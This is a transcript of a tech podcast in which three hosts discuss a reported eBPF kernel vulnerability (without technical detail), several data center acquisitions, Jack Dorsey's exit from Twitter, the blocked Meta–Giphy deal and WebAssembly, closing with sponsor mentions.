James Thomason:So these are one-time-use, right? I mean, you do that one time and the jig is up; same for these zero days. But these things turn up in really unusual places. Like, I don't know if you know the security researcher chompie; her name is Valentina Palmiotti. She's at a security research company in Chicago, and she found a kernel vulnerability using eBPF. If you don't know, eBPF is the new, fancy BPF project. Basically, it lets you run bytecode in the kernel that does low-level network processing, like, within the Linux kernel. And so she was able to demonstrate, I think, several different exploitation techniques that actually do it. Security nerds: there's a great article out of Grapl about that. You've probably already seen it if you're a security nerd, but I found it a fascinating exploit. And I think the interesting thing of this is that finding exploits like this is a really low-level activity. I mean, you really have to get down into the weeds and think about this stuff. And, like, who has time to do that, if your name isn't chompie? Not me. I'm going to be out plugging things in in a data center.
Dean Nelson:Did you see that? That was a double joke, by the way. Chomp. Oh, yeah. And then that was it. Thank you, I got the bit.
James Thomason:Brutal, brutal. Yep. Okay, well, switching gears a little bit: there were a flurry of acquisitions in the data center space while we were away, some of us in Italy, some of us at a trade show, some of us in the data center. First and foremost, I want to mention that previously on the show we had ITRenew's president, Ali Fenn, on. Wonderful show, super interesting what they're doing. And they have been acquired. And I gotta admit, I did not see this one coming: they were acquired by Iron Mountain, which is best known, I think, for secure document storage and shredding and that kind of thing, right?
Dean Nelson:Yeah, but they also have a very large data center division, a pretty large portfolio. And when I was at Uber, we had a deployment in Iron Mountain, which is actually in a mountain, the one near Pittsburgh. It's why it's called Iron Mountain. It's 240 feet below the earth, and so when you go in there, it's really cool. I always find it funny: when they have to expand, they have to use dynamite, in a data center. They drill into the bedrock, they put in their dynamite sticks, and they blow out sections so they can carve a room that's going to be a data hall inside. So we had deployments over there. But they've also got all the archives from the movie studios, HBO, all the films; they store them in there. And we talked about it on the show before, I think: when 9/11 happened, that's where Dick Cheney went, for the separation and isolation.
James Thomason:Yeah, down the rabbit hole. Went to ground faster than Dick Cheney in an international crisis; that's what I used to say.
Dean Nelson:In a vault, it is. But this acquisition also caught me off guard, because private equity has been going to town on acquisitions, as we've seen. But ITRenew was acquired by, really, a data storage company, though one with a data center division. And there's so much volume in the stuff that ITRenew deals with: the ingest of retired equipment, right, and the refreshing and renewing or parting out of those things. That's a massive, massive supply chain management operation. But there's such value in ITRenew because of the renewed hardware itself and what it can be used for. They were sold for $925 million.
James Thomason:Right, yeah. So much value, in fact, that they paid 12 times EBITDA for ITRenew: $725 million in cash, the remaining 20% in stock. And I guess what that means is that Ali is taking us for a steak dinner. I think that's what that means.
Dean Nelson:Actually, I think she's buying the entire chain of restaurants, for us to go to whenever we want. Congratulations, Ali, and to Aidin, the actual CEO over there. The president and CEO are, I'm sure, clapping their hands and going into the next phase of what's going to happen at their company.
James Thomason:Absolutely. Congratulations, guys, and couldn't happen to a nicer team.
Dean Nelson:Yep. Speaking of which, I've got to share something. You know, we had the iMasons awards on December 15, and the Technology Champion award winner was Ali Fenn. Oh, really? Very cool. And then on top of that, Aidin won the Sustainability Champion award from Data Center Dynamics last week as well. So yeah, they're having a banner year, a really good week, you know?
James Thomason:Yeah, really a banner December. Merry Christmas, happy holidays.
Dean Nelson:So congratulations to Aidin and Ali, yeah.
James Thomason:Yeah, amazing, amazing. And there were more, there were more data center acquisitions, more acquisitions in the space, right? So CyrusOne and CoreSite: $25 billion in a day.
Brad Kirby:The same day, the same day.
Dean Nelson:Same day. Same announcements.
Brad Kirby:KKR and Global Infrastructure Partners took CyrusOne for a combined $15 billion. And then American Tower came in and took CoreSite for $10 billion. The largest acquisition on record was formerly, I believe, Blackstone buying QTS. That was last year?
Dean Nelson:No, that was this year, right. So if you think about it, there's $35 billion worth of data center acquisitions just in the last two months. $35 billion, all private equity. It's just solidifying what's going on and the money being poured into it, right, infrastructure funds and expansion. And they love this asset class, because these are long-term investments that are going to have consistent returns.
James Thomason:And you need them, especially ones like CoreSite. CoreSite's an interesting one, because through the last 20 years they managed to acquire some of the premier properties where there are peering and internet exchange points, and just a very high density of carriers in one space. So much so, in fact, that they are able to charge a premium for the space and power that they lease. If you want to get in there and connect with those networks, be prepared to pay.
Dean Nelson:Five times the normal hyperscale price. Yeah, 5x, no exaggeration.
James Thomason:Through the nose. And they can and will raise prices going forward as well.
Dean Nelson:That's a supply-and-demand thing, though. If you think about One Wilshire, in LA, yeah, that's...
James Thomason:That's exactly what I was thinking of, by the way, when I was talking about CoreSite, one of those.
Dean Nelson:It is, I think, one of, if not the most connected internet exchange in the world. And it's operated by CoreSite; the building itself is owned by somebody else, right? Doesn't GI Partners own the building? I think they do, actually. So yeah. Okay, got it. So now they own CoreSite, which is the one that operated all of the exchange interconnections within that actual building itself. That's a really interesting acquisition. Oh, no, no, sorry: GI Partners... but CyrusOne... now I'm confused. They own One Wilshire. That's interesting. And then the infrastructure one... I forget. One of the guys that I know works at GI Partners, John; he ran Infomart. He's an investor in my company.
Brad Kirby:There's GI Partners, and there's Global Infrastructure Partners. GI Partners is the one that owns One Wilshire; Global Infrastructure Partners is the one based in New York.
Dean Nelson:Got it. Okay, I'm mixing that up, then. Got it. All right, interesting. Okay, good.
James Thomason:So we sorted that out.
Dean Nelson:Yeah. So KKR and Global Infrastructure Partners bought CyrusOne, okay, and then you've got American Tower and CoreSite. That's a totally different type of approach. If you think about American Tower, they're the largest tower company in the country, or the world, right? They have like 45,000 tower sites or something like that, I think it is. But the way they explained it is that because they are at the edge of the internet, where all of these things are distributed, now they want to be at the core too, and they bought CoreSite because CoreSite has the largest concentration of internet exchanges in their portfolio. So, a pretty smart move when you think about the other competitors. But this makes me think: who's next? We're not gonna speculate, but there's only so many data center companies.
James Thomason:I know too much. I dare not say.
Brad Kirby:Well, if you don't have any information and you know too many people, you'd just really be speculating in public, I would say.
James Thomason:I honestly cannot say anything about anything.
Dean Nelson:I know nothing. I know nothing. I have zero. Yes. All I know is there's going to be some action going on. I mean, I didn't expect to have $25 billion land in one Monday, right? And those kinds of things. We knew that some of these people were shopping, and there was other interest and things, and there are lots of conversations that come back around. But it's a hot, hot, hot space.
James Thomason:Well, ladies and gentlemen, the absentee landlord of social media has left the building. That's right: Jack Dorsey has exited Twitter and handed over the reins to another CEO.
Dean Nelson:Thank you. Thank you. Let me tweet. Yeah.
James Thomason:Right, you'll be able to tweet about that immediately. Yeah, tweet a victory lap. So the interesting thing here is, he left to pursue Square full time, which I think is great, because before COVID, and this is serious, Jack was going to move out into the middle of the desert in Africa somewhere, into like a meditation hut, while still running both companies. So I think that there's been an awakening, and people have realized that while the rest of the market is up 130-plus percent, Twitter stock has gone nowhere. So I think that pressure has finally come to bear, and Jack is out. I don't think this helps Twitter, though. I think they are proverbially screwed.
Brad Kirby:Really? Why is that?
James Thomason:Well, I just think that what they have done, and what other social media has done, vis-à-vis censorship and labeling people's tweets, presumably objectively, as misinformation... of course, it's been revealed now that all that's just the opinion of whatever random editor or contractor happens to have your tweet pop up when someone flags it, in the case of Facebook at least. But yeah, I think that this form of social media has very limited utility going forward. I think everyone's experiencing kind of a burnout from it, and probably we'll see a migration to more concentrated and smaller platforms that just connect you with the people that you actually know in real life, and maybe don't connect you with randos from the internet who want to weigh in and opine on something that you are writing to your friends. Of course, for celebrities and the proverbial blue checks of the world, it'll continue to be a platform for connecting to their audiences to some degree, but there's a lot of competition there. You've got TikTok, you've got Instagram, Facebook, you're going to have Meta. So I just think that for this particular form of media, its days are numbered. In short.
Brad Kirby:Square's worth twice as much, right? They're worth 100 billion, compared to...
James Thomason:Yeah, well, Square is like a real company, right? I mean, they're a real company. And they rebranded, right? So they're not gonna be Square anymore, they're Box... right? They're Box. Kill me now. When they rebranded, they rebranded themselves to Box... wasn't it Box? Yes, like that... Block? Block, yeah.
Dean Nelson:I would say Box might have a problem with that.
James Thomason:They rebranded as Block. So they're no longer Square; they are now Block. Got it, they're Block. Okay. I think the idea is that a block is three-dimensional, and they're acquiring more companies, and they're doing more than just what Square set out to do in the first place. So now they're Block, kind of like Facebook becoming Meta. It's the trendy thing to do. Because Zuckerberg beat him to the punch, he has to do it also. I don't know.
Brad Kirby:I wonder if Twitter rebrands
Dean Nelson:They could be called Omniverse. That's a one-up on Meta.
Brad Kirby:That would be NVIDIA, though.
Dean Nelson:Oh, yeah. Okay. They could also become Omicron. That would be bad. Yeah.
James Thomason:What else happened? Meta has failed to acquire Giphy. That's kind of a big one, right? Meta failed.
Brad Kirby:Yes. A small acquisition, only 400 million. If you look at what they acquired Instagram and WhatsApp for, on a relative basis, from a value perspective, it's a bit surprising. And Oculus, too. They were all substantially more in terms of valuation: they paid $19 billion for WhatsApp, $2 billion for Oculus, I think, back in 2014. Instagram was only like $715 million back in 2012 or something.
James Thomason:Only $700 million, yeah. But think about it: only $400 million for Giphy.
Brad Kirby:I like what the FTC commissioner, Rebecca Slaughter, says: she thinks serial acquisition has become a Pac-Man strategy of just eating. And if you think about it, what do you use for GIFs other than Giphy? Like, I don't know, if you're on Slack or any other messenger, usually it's Giphy, right?
James Thomason:I mean, there's a million of these things out there, and they aren't all the same thing, but are they really competitive? And again, is the market for, like, short one-to-two-second animated GIFs in a text stream going to be a huge thing ten years from now? You know, I don't know. I view these kinds of plays as just a way of soaking up more users into the platform. It's more of an eyeballs thing, right?
Brad Kirby:Think about the Meta aspects of it, though, when you go download it and build it into the AR, which they've already done on Facebook, where you can build in the AR aspects. So I think that's the play there, and probably some of the IP that was there. It's interesting that they blocked it as an antitrust matter.
Dean Nelson:That's actually because of what's been going on with Instagram and all the other platforms that have come together, WhatsApp. They didn't want Giphy to be absorbed into the Meta machine, right? That's why they stopped it.
Brad Kirby:Yeah, I think that's it. Yeah.
James Thomason:Yeah. There should be more of that. We need more of that.
Dean Nelson:We do. It's the Pac-Man strategy.
James Thomason:I've said it before: we broke up Standard Oil at only 90% market domination. I don't think we need to let Facebook or Google get to 100% in their respective markets before we start trimming them down. The world will be a better place; the water will be oxygenated. So I'm glad that they got blocked, although I feel bad for the Giphy people, who are not collecting a $400 million check. That's the rub, right? Entrepreneurs start companies to make lots of money, and if we block acquisitions, then that doesn't happen, necessarily, as fast or as big as it could. And that would limit it for some of them. Well, according to The New Stack, the top internet technology of 2021 was WebAssembly. Who could have seen this coming? Who could have seen it coming? But this is fitting, because our next guest on The Next Wave podcast is going to be a co-founder of the Bytecode Alliance. The Bytecode Alliance is an organization that is shepherding the development of WebAssembly and many related technologies in that ecosystem. My own company, EDJX, recently joined the Bytecode Alliance to work on WebAssembly. Our guest works at Fastly; Fastly is a competitor, but that's okay, we feel very good about competitors that are smart and doing incredible things. And we're very excited to be part of the alliance. I should say the alliance is getting pretty big, right? I mean, Microsoft is in the alliance. How many members are we up to in the alliance, Brad?
Brad Kirby:So Google... yeah, you guys are friends with DFINITY; they're...
James Thomason:DFINITY, DFINITY. Other competitors, I tell you.
Brad Kirby:It's about 20 companies, but Mozilla is in there too. The whole WebAssembly team at Fastly pretty much came from Mozilla, their entire WebAssembly group, yes, including one of the co-founders of WebAssembly, one of the writers of the actual spec back when it was released in 2017.
James Thomason:We've talked about this before. WebAssembly is a new technology that, as you might guess from the name, was born in the web, for the client side. What it is, is a new type of virtual machine target for compiling code and running it. So, not unlike Java: there's a Java virtual machine that runs everywhere; WebAssembly is a virtual machine that can run right in your browser. The difference is, the code is very close to machine code itself, so it's very fast. It works very well for retargeting low-level languages: Rust or C and C++ can be very, very easily targeted, and have been targeted, to WebAssembly. And I personally think this is one of the most transformative technologies that we'll see in the decade. Since JavaScript. Since Java, really, and that's after I, you know, kicked Java in the proverbial teeth earlier. But truly, over the next decade, applications are going to increasingly be ported onto WebAssembly, I think, as a common target. The explosion of interest in this space is just phenomenal to witness, and we're excited to be a part of it. And I'm very fortunate that our guest is willing to come on to The Next Wave and talk to us about it. I think he will share a tremendous amount of insight, since he's been there from the beginning, and we're personally more Johnny-come-latelies. Well, not really: we've been doing WebAssembly now for two years, which I think is ancient in the WebAssembly space.
Dean Nelson:But you know what else is on that list? NVIDIA, at number five. There's Omniverse, as we just said. It sounds like we need to get a couple of guests on: a Metaverse one and then an Omniverse one. Yeah, and then we're gonna bring on Omicron.
Brad Kirby:I seem to recall you know one of the top 30 most influential people in the space. Or you received an email, so...
Dean Nelson:Oh, yeah, that's right, that's right. We'll go see who we can get onto the show.
Brad Kirby:I think we can get those guys back to back here next week. That'd be fun. That'd be good too.
James Thomason:Awesome. Well, Dean, what about the Skinwalker Ranch guy? Can we get him?
Dean Nelson:Hell yeah, I gotta reach back out to him. Yes, we got to do that. Yes, Skinwalker Ranch.
James Thomason:We haven't had any good UFO news or Sasquatch news in a while, and we've got to get the Skinwalker guy. That'd be amazing. Folks, if you enjoy podcasts such as this one, where we keep you informed about the latest trends in tech and bring you the best and brightest leaders in the industry who are truly transforming the world, please do give us a like; it helps us grow our audience. We are sponsored, as ever, by Infrastructure Masons, who are uniting the builders of the digital age. Learn how you can participate by going on the web to imasons.org. That's iMasons dot ORG. And by EDJX: we are building a new type of distributed computing platform to create smarter, faster websites and data pipelines on our secure global edge platform. Visit us on the web at EDJX.io. That's EDJX.io.